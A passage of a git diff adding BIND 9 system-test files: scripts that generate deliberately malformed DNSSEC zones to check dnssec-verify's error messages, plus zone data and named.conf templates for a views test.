+ unsigned) + expect1="Zone contains no DNSSEC keys" + ;; + *.extra-nsec3) + expect1="Expected and found NSEC3 chains not equal"; + ;; + *) + dumpit=1 + ;; + esac + $VERIFY ${only} -o $zone $file > verify.out.$n 2>&1 && ret=1 + grep "${expect1:-.}" verify.out.$n > /dev/null || ret=1 + grep "${expect2:-.}" verify.out.$n > /dev/null || ret=1 + [ $ret = 0 ] || failed + [ $dumpit = 1 ] && cat verify.out.$n +done + +n=`expr $n + 1` +echo_i "checking error message when -o is not used and a SOA record not at top of zone is found ($n)" +ret=0 +# When -o is not used, origin is set to zone file name, which should cause an error in this case +$VERIFY zones/ksk+zsk.nsec.good > verify.out.$n 2>&1 && ret=1 +grep "not at top of zone" verify.out.$n > /dev/null || ret=1 +grep "use -o to specify a different zone origin" verify.out.$n > /dev/null || ret=1 +[ $ret = 0 ] || failed + +n=`expr $n + 1` +echo_i "checking error message when an invalid -o is specified and a SOA record not at top of zone is found ($n)" +ret=0 +$VERIFY -o invalid.origin zones/ksk+zsk.nsec.good > verify.out.$n 2>&1 && ret=1 +grep "not at top of zone" verify.out.$n > /dev/null || ret=1 +grep "use -o to specify a different zone origin" verify.out.$n > /dev/null && ret=1 +[ $ret = 0 ] || failed + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/verify/zones/genzones.sh b/bin/tests/system/verify/zones/genzones.sh new file mode 100644 index 0000000..d0ab4e5 --- /dev/null +++ b/bin/tests/system/verify/zones/genzones.sh @@ -0,0 +1,248 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=verify + +dumpit () { + echo_d "${debug}: dumping ${1}" + cat "${1}" | cat_d +} + +setup () { + echo_i "setting up $2 zone: $1" + debug="$1" + zone="$1" + file="$1.$2" + n=$((${n:-0} + 1)) +} + +# A unsigned zone should fail validation. +setup unsigned bad +cp unsigned.db unsigned.bad + +# A set of nsec zones. +setup zsk-only.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec.apex-dname good +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cp unsigned.db ${file}.tmp +echo "@ DNAME data" >> ${file}.tmp +$SIGNER -SP -o ${zone} -f ${file} ${file}.tmp > s.out$n || dumpit s.out$n + +# A set of nsec3 zones. +setup zsk-only.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.optout good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - -A -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3.apex-dname good +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cp unsigned.db ${file}.tmp +echo "@ DNAME data" >> ${file}.tmp +$SIGNER -3 - -SP -o ${zone} -f ${file} ${file}.tmp > s.out$n || dumpit s.out$n + +# +# generate an NSEC record like +# aba NSEC FOO ... +# then downcase all the FOO records so the next name in the database +# becomes foo when the zone is loaded. +# +setup nsec-next-name-case-mismatch good +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat << EOF > ${zone}.tmp +\$TTL 0 +@ IN SOA foo . ( 1 28800 7200 604800 1800 ) +@ NS foo +\$include $ksk.key +\$include $zsk.key +FOO AAAA ::1 +FOO A 127.0.0.2 +aba CNAME FOO +EOF +$SIGNER -zP -o ${zone} -f ${file}.tmp ${zone}.tmp > s.out$n || dumpit s.out$n +sed 's/^FOO\./foo\./' < ${file}.tmp > ${file} + +# A set of zones with only DNSKEY records. +setup zsk-only.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key > ${file} + +setup ksk-only.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key > ${file} + +setup ksk+zsk.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2>kg.out) || dumpit kg.out$n +key2=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key $key2.key > ${file} + +# A set of zones with expired records +s="-s -2678400" +setup zsk-only.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SP ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SPz ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -SP ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup zsk-only.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - ${s} -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - ${s} -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - ${s} -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +# ksk expired +setup ksk+zsk.nsec.ksk-expired bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -Px -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n +$SIGNER ${s} -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +now=$(date -u +%Y%m%d%H%M%S) +exp=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" { print $9;}' ${file}) +[ "${exp:-40001231246060}" -lt ${now:-0} ] || dumpit $file + +setup ksk+zsk.nsec3.ksk-expired bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -Px -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n +$SIGNER -3 - ${s} -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +now=$(date -u +%Y%m%d%H%M%S) +exp=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" { print $9;}' ${file}) +[ "${exp:-40001231246060}" -lt ${now:-0} ] || dumpit $file + +# broken nsec chain +setup ksk+zsk.nsec.broken-chain bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk '$4 == "NSEC" { $5 = "'$zone'."; print } { print }' ${file} > ${file}.tmp +$SIGNER -Px -Z nonsecify -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# bad nsec bitmap +setup ksk+zsk.nsec.bad-bitmap bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk '$4 == "NSEC" && /SOA/ { $6=""; print } { print }' ${file} > ${file}.tmp +$SIGNER -Px -Z nonsecify -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# extra NSEC record out side of zone +setup ksk+zsk.nsec.out-of-zone-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "out-of-zone. 3600 IN NSEC ${zone}. A" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n + +# extra NSEC record below bottom of zone +setup ksk+zsk.nsec.below-bottom-of-zone-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "ns.sub.${zone}. 3600 IN NSEC ${zone}. A AAAA" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file}.tmp ${file} $zsk > s.out$n || dumpit s.out$n +# dnssec-signzone signs any node with a NSEC record. +awk '$1 ~ /^ns.sub/ && $4 == "RRSIG" && $5 != "NSEC" { next; } { print; }' ${file}.tmp > ${file} + +# extra NSEC record below DNAME +setup ksk+zsk.nsec.below-dname-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "sub.dname.${zone}. 3600 IN NSEC ${zone}. TXT" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n + +# missing NSEC3 record at empty node +# extract the hash fields from the empty node's NSEC 3 record then fix up +# the NSEC3 chain to remove it +setup ksk+zsk.nsec3.missing-empty bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +a=$(awk '$4 == "NSEC3" && NF == 9 { split($1, a, "."); print a[1]; }' ${file}) +b=$(awk '$4 == "NSEC3" && NF == 9 { print $9; }' ${file}) +awk ' +$4 == "NSEC3" && $9 == "'$a'" { $9 = "'$b'"; print; next; } +$4 == "NSEC3" && NF == 9 { next; } +{ print; }' ${file} > ${file}.tmp +$SIGNER -3 - -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# extra NSEC3 record +setup ksk+zsk.nsec3.extra-nsec3 bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk ' +BEGIN { + ZONE="'${zone}'."; +} +$4 == "NSEC3" && NF == 9 { + $1 = "H9P7U7TR2U91D0V0LJS9L1GIDNP90U3H." ZONE; + $9 = "H9P7U7TR2U91D0V0LJS9L1GIDNP90U3I"; + print; +}' ${file} > ${file}.tmp +cat ${file}.tmp >> ${file} +rm -f ${file}.tmp +$SIGNER -3 - -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n diff --git a/bin/tests/system/verify/zones/unsigned.db b/bin/tests/system/verify/zones/unsigned.db new file mode 100644 index 0000000..1e7cd2b --- /dev/null +++ b/bin/tests/system/verify/zones/unsigned.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA . . 0 0 0 2419200 3600 ; 28 day expire +@ NS . +data A 1.2.3.4 +dname DNAME data +longttl 2419200 A 1.2.3.4 +sub.dname TXT sub.dname +sub.empty TXT sub.empty +sub NS ns.sub +ns.sub A 1.2.3.4 +ns.sub AAAA 2002::1.2.3.4 +ns.sub WKS 1.2.3.4 udp domain +other.sub TXT other.sub +secure NS secure +secure DS 1312 50 100 96EEB2FFD9B00CD4694E78278B5EFDAB0A80446567B69F634DA078F0 +secure A 1.2.3.4 +secure AAAA 2002::1.2.3.4 +out-of-zone. A 1.2.3.4 diff --git a/bin/tests/system/views/clean.sh b/bin/tests/system/views/clean.sh new file mode 100644 index 0000000..d644c2a --- /dev/null +++ b/bin/tests/system/views/clean.sh @@ -0,0 +1,38 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +# +# Clean up after zone transfer tests. +# + +rm -f ns*/named.conf +rm -f ns3/example.bk dig.out.ns?.? +rm -f ns2/example.db ns3/internal.bk +rm -f -- */*.jnl +rm -f -- */named.memstats +rm -f -- */named.run */named.run.prev +rm -f ns2/external/K* +rm -f ns2/external/inline.db.jbk +rm -f ns2/external/inline.db.signed +rm -f ns2/external/inline.db.signed.jnl +rm -f ns2/internal/K* +rm -f ns2/internal/inline.db.jbk +rm -f ns2/internal/inline.db.signed +rm -f ns2/internal/inline.db.signed.jnl +rm -f ns2/zones.conf +rm -f ns2/db.* ns2/K* +rm -f dig.out.external dig.out.internal +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/views/ns1/named.conf.in b/bin/tests/system/views/ns1/named.conf.in new file mode 100644 index 0000000..eb079c9 --- /dev/null +++ b/bin/tests/system/views/ns1/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/views/ns1/root.db b/bin/tests/system/views/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/views/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/views/ns2/1.10.in-addr.arpa.db b/bin/tests/system/views/ns2/1.10.in-addr.arpa.db new file mode 100644 index 0000000..7ca723d --- /dev/null +++ b/bin/tests/system/views/ns2/1.10.in-addr.arpa.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN SOA . . 0 0 0 0 0 +@ IN NS . diff --git a/bin/tests/system/views/ns2/clone.db b/bin/tests/system/views/ns2/clone.db new file mode 100644 index 0000000..0f2de76 --- /dev/null +++ b/bin/tests/system/views/ns2/clone.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2 +ns2 IN A 10.53.0.2 + +a IN A 10.1.0.1 +child IN NS ns3.child +ns3.child IN A 10.53.0.3 diff --git a/bin/tests/system/views/ns2/example1.db b/bin/tests/system/views/ns2/example1.db new file mode 100644 index 0000000..4d60ce3 --- /dev/null +++ b/bin/tests/system/views/ns2/example1.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. + +mail A 10.0.0.2 diff --git a/bin/tests/system/views/ns2/example2.db b/bin/tests/system/views/ns2/example2.db new file mode 100644 index 0000000..966240e --- /dev/null +++ b/bin/tests/system/views/ns2/example2.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.4 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. + +mail A 10.0.0.2 diff --git a/bin/tests/system/views/ns2/external/inline.db b/bin/tests/system/views/ns2/external/inline.db new file mode 100644 index 0000000..16d53b9 --- /dev/null +++ b/bin/tests/system/views/ns2/external/inline.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +inline. IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +inline. NS ns2.inline. +ns2.inline. A 10.53.0.2 +inline. NS ns3.inline. +ns3.inline. A 10.53.0.3 + +$ORIGIN inline. +a A 10.1.0.1 + MX 10 extmail.inline. + +extmail A 10.1.0.2 diff --git a/bin/tests/system/views/ns2/internal.db b/bin/tests/system/views/ns2/internal.db new file mode 100644 index 0000000..4f1014f --- /dev/null +++ b/bin/tests/system/views/ns2/internal.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.1.0.1 + MX 10 intmail.example. + +intmail A 10.1.0.2 diff --git a/bin/tests/system/views/ns2/internal/inline.db b/bin/tests/system/views/ns2/internal/inline.db new file mode 100644 index 0000000..7a30873 --- /dev/null +++ b/bin/tests/system/views/ns2/internal/inline.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +inline. IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +inline. NS ns2.inline. +ns2.inline. A 10.53.0.2 +inline. NS ns3.inline. +ns3.inline. A 10.53.0.3 + +$ORIGIN inline. +a A 10.1.0.1 + MX 10 intmail.inline. + +intmail A 10.1.0.2 diff --git a/bin/tests/system/views/ns2/named1.conf.in b/bin/tests/system/views/ns2/named1.conf.in new file mode 100644 index 0000000..857235d --- /dev/null +++ b/bin/tests/system/views/ns2/named1.conf.in @@ -0,0 +1,53 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; +}; + +zone "inline" { + type primary; + file "external/inline.db"; + key-directory "external"; + auto-dnssec maintain; + inline-signing yes; +}; diff --git a/bin/tests/system/views/ns2/named2.conf.in b/bin/tests/system/views/ns2/named2.conf.in new file mode 100644 index 0000000..f8759fb --- /dev/null +++ b/bin/tests/system/views/ns2/named2.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "internal" { + match-clients { 10.53.0.2; + 10.53.0.3; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "example" { + type primary; + file "internal.db"; + allow-update { any; }; + }; + + zone "clone" { + type primary; + file "clone.db"; + allow-update { any; }; + }; + + zone "1.10.in-addr.arpa" { + type primary; + file "1.10.in-addr.arpa.db"; + }; + + zone "inline" { + type primary; + file "internal/inline.db"; + key-directory "internal"; + auto-dnssec maintain; + inline-signing yes; + }; +}; + +view "external" { + match-clients { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "example" { + type primary; + file "example.db"; + }; + + zone "clone" { + in-view internal; + forward only; + forwarders { 10.53.0.5; }; + }; + + zone "1.10.in-addr.arpa" { + in-view internal; + }; + + zone "inline" { + type primary; + file "external/inline.db"; + key-directory "external"; + auto-dnssec maintain; + inline-signing yes; + }; +}; diff --git a/bin/tests/system/views/ns2/named3.conf.in b/bin/tests/system/views/ns2/named3.conf.in new file mode 100644 index 0000000..838cfb8 --- /dev/null +++ b/bin/tests/system/views/ns2/named3.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet 